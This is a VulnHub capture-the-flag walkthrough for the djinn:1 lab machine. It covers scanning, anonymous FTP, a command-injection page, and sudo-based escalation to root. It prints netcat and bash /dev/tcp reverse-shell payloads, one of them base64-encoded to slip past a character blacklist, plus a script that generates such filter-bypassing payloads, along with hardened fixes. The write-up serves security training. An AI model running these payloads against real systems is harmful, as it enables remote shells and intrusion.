vulnhub-walkthrough[djinn-1]

name

Name: djinn: 1
Date release: 18 Nov 2019

download

Download: https://drive.google.com/file/d/1LlT5JcdlyDUcvkn12t9oIIFo0X9Gt53B/view?usp=sharing
Download (Mirror): https://download.vulnhub.com/djinn/djinn.ova
Download (Torrent): https://download.vulnhub.com/djinn/djinn.ova.torrent

description

  • Level: Beginner-Intermediate
  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. DHCP will assign an IP automatically; you'll see the IP on the login screen. You have to find and read two flags (user and root), which are in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

information gathering

First, a host-discovery sweep with nmap, then a full TCP port scan with version detection and default scripts:

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.127
Host is up (0.00013s latency).
MAC Address: 08:00:27:03:DB:2D (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -sV -sC -v -p- -T4 192.168.56.127
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.126
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '*', 9)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 5)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
  • Enumeration

Anonymous FTP login is allowed, so grab the three files:

root@kali:~/vulnhub/djinn-1# ftp 192.168.56.127
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (109.6142 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.02 secs (7.0244 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.05 secs (2.4331 kB/s)

Check their contents:

root@kali:~/vulnhub/djinn-1# cat creds.txt 
nitu:81299
root@kali:~/vulnhub/djinn-1# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
root@kali:~/vulnhub/djinn-1# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

Connect with netcat to play the game:

root@kali:~# nc 192.168.56.127 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '+', 9)
> 18
(3, '-', 1)
> 2
(2, '/', 3)
> 2
Wrong answer

It's just a time sink; move on to the next service.
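The walkthrough doesn't play the game through, but the prompt format is simple enough to automate. The following is an added example, not part of the original walkthrough: it parses prompts of the form (9, '+', 9), answers them over a socket and returns whatever the service sends after the last answer. The host, port and round count are taken from the text above; how the service scores a non-integer quotient such as (2, '/', 3) is not shown on this page, so the division handling is an assumption.

```python
import operator
import re
import socket

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
# Prompt format observed over nc: (9, '+', 9)
QUESTION = re.compile(r"\(\s*(-?\d+)\s*,\s*'([+\-*/])'\s*,\s*(-?\d+)\s*\)")


def solve(text):
    """Find the first question in `text` and return its answer, or None if
    the text holds no question (e.g. the banner or a partial line)."""
    m = QUESTION.search(text)
    if m is None:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    result = OPS[op](a, b)
    # Assumption: exact quotients are wanted as integers ("2", not "2.0");
    # what the service expects for 2/3 is not shown in the walkthrough.
    if isinstance(result, float) and result.is_integer():
        result = int(result)
    return result


def play(host="192.168.56.127", port=1337, rounds=1000, timeout=5):
    """Answer up to `rounds` questions and return (answered, last_output).
    The game closes the connection on a wrong answer, so an empty read
    ends the loop early."""
    answered = 0
    tail = ""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        while answered < rounds:
            data = sock.recv(4096)
            if not data:
                break
            tail = data.decode(errors="replace")
            answer = solve(tail)
            if answer is None:
                continue  # banner or incomplete prompt: read more
            sock.sendall(("%s\n" % answer).encode())
            answered += 1
        try:
            tail += sock.recv(4096).decode(errors="replace")  # the "gift", if any
        except socket.timeout:
            pass
    return answered, tail


if __name__ == "__main__":
    n, out = play()
    print("answered %d questions" % n)
    print(out)
```

Run it against the box and inspect the returned tail; if the service rejects the float answer for an inexact division, adjust solve() (e.g. floor division) and rerun.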

Next, the web service on port 7331:

http://192.168.56.127:7331/

Brute-force directories with gobuster:

gobuster dir -u http://192.168.56.127:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
/genie (Status: 200)
/wish (Status: 200)

/genie on its own just shows an error-style message and looks like a dead end; /wish is more interesting:

http://192.168.56.127:7331/wish

This page executes whatever is submitted in the cmd field and redirects to /genie with the command output in the name parameter.

request:

POST /wish HTTP/1.1
Host: 192.168.56.127:7331
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://192.168.56.127:7331
Connection: close
Referer: http://192.168.56.127:7331/wish
Upgrade-Insecure-Requests: 1

cmd=id

response:

HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 379
Location: http://192.168.56.127:7331/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A
Server: Werkzeug/0.16.0 Python/2.7.15+
Date: Sat, 23 May 2020 05:03:45 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A">/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A</a>. If not click the link.
  • Exploitation

First attempt, a plain netcat reverse shell:

nc -e /bin/sh 192.168.56.126 1155

Submitting that payload produces the following error:

http://192.168.56.127:7331/genie?name=Wrong+choice+of+words

Some characters are filtered (the nc payload contains both / and .).

Use a different payload instead: base64-encode the whole command so that none of the filtered characters appear in the request itself. Check the encoded string before sending it, because the base64 alphabet contains /; this one happens to be clean.

bash -i >& /dev/tcp/192.168.56.126/8080 0>&1

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEyNi84MDgwIDA+JjE= | base64 -d | bash

The listener catches the shell:

root@kali:~# nc -lvp 8080
listening on [any] 8080 ...
192.168.56.127: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.126] from (UNKNOWN) [192.168.56.127] 47358
bash: cannot set terminal process group (758): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$ whoami
whoami
www-data

Let's look around. The app runs from /opt/80, and app.py shows exactly what the filter does (note also the hard-coded secret_key and debug=True, which exposes Werkzeug's interactive debugger on any unhandled exception):

www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"

RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True

    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False


@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")


@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True,
                                      stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"

        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')


@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"

    return render_template('genie.html', file=page)


if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
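To see precisely why the nc payload was rejected and the base64 one accepted, here is the filter re-implemented alongside a payload builder and a hardened replacement. This is an added example for this page, not code from the box: validate() and its two constants are copied from the app.py above; encode_for_filter(), decode_payload(), ALLOWED and run_allowlisted() are illustrative names introduced here. Two details of the original filter are worth noting: the blacklist is compared one character at a time, so the entry "eval" can never match, and any command that mentions the creds path without the word "cat" is passed straight through.

```python
import base64
import subprocess

# validate() and its constants reproduce the filter from /opt/80/app.py as
# printed above; everything else in this block is added illustration.
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    """True means app.py hands `cmd` to subprocess.Popen(..., shell=True)."""
    # Shortcut: any command that names the creds file passes untouched,
    # as long as the word "cat" is absent (so `head` or `less` would do).
    if CREDS in cmd and "cat" not in cmd:
        return True
    for bad in RCE:
        for ch in cmd:
            # Compares one character at a time, so the multi-character
            # entry "eval" can never match: that blacklist entry is dead.
            if bad == ch:
                return False
    return True


def encode_for_filter(cmd):
    """Return a one-liner that runs `cmd` but contains none of the filtered
    characters. The page's trick is base64, but '/' is part of the base64
    alphabet, so the encoded text itself can trip the filter; shifting the
    3-byte alignment with leading spaces gives three different encodings to
    try. If all three contain '/', fall back to octal escapes for printf,
    whose output alphabet (digits and backslash) is always clean."""
    for pad in range(3):
        enc = base64.b64encode((" " * pad + cmd).encode()).decode()
        payload = "echo %s | base64 -d | bash" % enc
        if validate(payload):
            return payload
    octal = "".join("\\%03o" % b for b in cmd.encode())
    return "printf '%s' | bash" % octal


def decode_payload(payload):
    """Recover the wrapped command from either wrapper (for checking)."""
    if payload.startswith("echo "):
        return base64.b64decode(payload.split()[1]).decode().strip()
    body = payload[len("printf '"):payload.index("' | bash")]
    return bytes(int(o, 8) for o in body.split("\\")[1:]).decode()


# Hardened counterpart: never build a shell string from user input.
# Map a request to a fixed argv and run it without a shell.
ALLOWED = {"id": ["id"], "whoami": ["whoami"], "uptime": ["uptime"]}


def run_allowlisted(name):
    argv = ALLOWED.get(name.strip())
    if argv is None:
        return None  # unknown request: refuse, don't try to sanitise
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=5, check=False).stdout
```

encode_for_filter() generalises the page's trick: it tries three alignments of the base64 encoding and, if every one of them contains a slash, falls back to octal escapes for printf, which can never contain a filtered character. The hardened version is not a better blacklist; it drops shell=True entirely and maps each request to a fixed argv.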
The credentials file referenced in app.py is readable as www-data:

cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9

Upgrade to a TTY with python's pty module, then switch to nitish with the recovered password:

www-data@djinn:/opt/80$ python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:/opt/80$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:/opt/80$ whoami
whoami
nitish

Finally, user.txt:

nitish@djinn:/opt/80$ cd ~
cd ~
nitish@djinn:~$ ls
ls
user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c

Post Exploitation

nitish@djinn:~$ sudo -l                                                                              
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie

Check how genie works:

nitish@djinn:~$ genie
genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:~$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
wish Enter your wish

optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command

The -cmd option doesn't appear in the help output, but it drops into a shell as sam:

nitish@djinn:~$ sudo -u sam genie -cmd new
sudo -u sam genie -cmd new
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ whoami
whoami
sam

Drop into bash for a proper shell, then enumerate again:

$ bash
bash
sam@djinn:~$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago

Privilege Escalation

Option 2 asks for a number; instead of a number, typing the word num is accepted and drops into a root shell:

sam@djinn:~$ sudo -u root /root/lago 
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
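What happened above, typing the literal word num instead of a number and being accepted, is the behaviour of Python 2's input(), which evaluates the typed text as an expression in the program's own scope, so the name of the variable holding the secret compares equal to the secret. The source of /root/lago is not shown in this walkthrough, so the following is an assumed reconstruction written for this page, not the box's code; Python 3's eval() stands in for Python 2's input(), and the function names are made up here.

```python
import random


def check_guess_vulnerable(raw, num):
    """Mimics `input()` under Python 2: the typed text is evaluated as an
    expression in a scope where the secret is bound to the name `num`.
    Builtins are stripped here only to keep the demo harmless; the real
    Python 2 input() evaluates in the caller's full scope."""
    try:
        guess = eval(raw, {"__builtins__": {}}, {"num": num})
    except Exception:
        return False
    return guess == num


def check_guess_hardened(raw, num):
    """Treat the text as data: parse it as an integer and range-check it.
    This is what raw_input() (Python 2) or input() (Python 3) plus int()
    gives you; no expression is ever evaluated."""
    try:
        guess = int(raw.strip())
    except ValueError:
        return False
    return 1 <= guess <= 100 and guess == num


def guess_the_number(raw, checker=check_guess_hardened, rng=random.Random()):
    """One round of the game: returns True when the guess is accepted."""
    num = rng.randint(1, 100)
    return checker(raw, num)


if __name__ == "__main__":
    # The same answer, "num", wins every time against the vulnerable
    # checker and never against the hardened one.
    print("vulnerable:", all(guess_the_number("num", check_guess_vulnerable) for _ in range(100)))
    print("hardened:  ", any(guess_the_number("num", check_guess_hardened) for _ in range(100)))
```

The fix is not a better comparison; it is never evaluating user input at all. Under Python 2 that means raw_input(), and in either version the value should be parsed with int() and range-checked before use.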

Finally, the root flag via proof.sh:

# bash
bash
root@djinn:~# su root
su root
root@djinn:/home/nitish# cd
root@djinn:~# ls
ls
lago proof.sh
root@djinn:~# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Sat May 23 11:23:39 IST 2020
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

Summary of knowledge

  • Command injection behind a character blacklist, bypassed by encoding the payload
  • Sensitive information disclosure (credentials in anonymous FTP and a world-readable file)
  • Privilege escalation through custom programs permitted by sudo

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lucifer11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…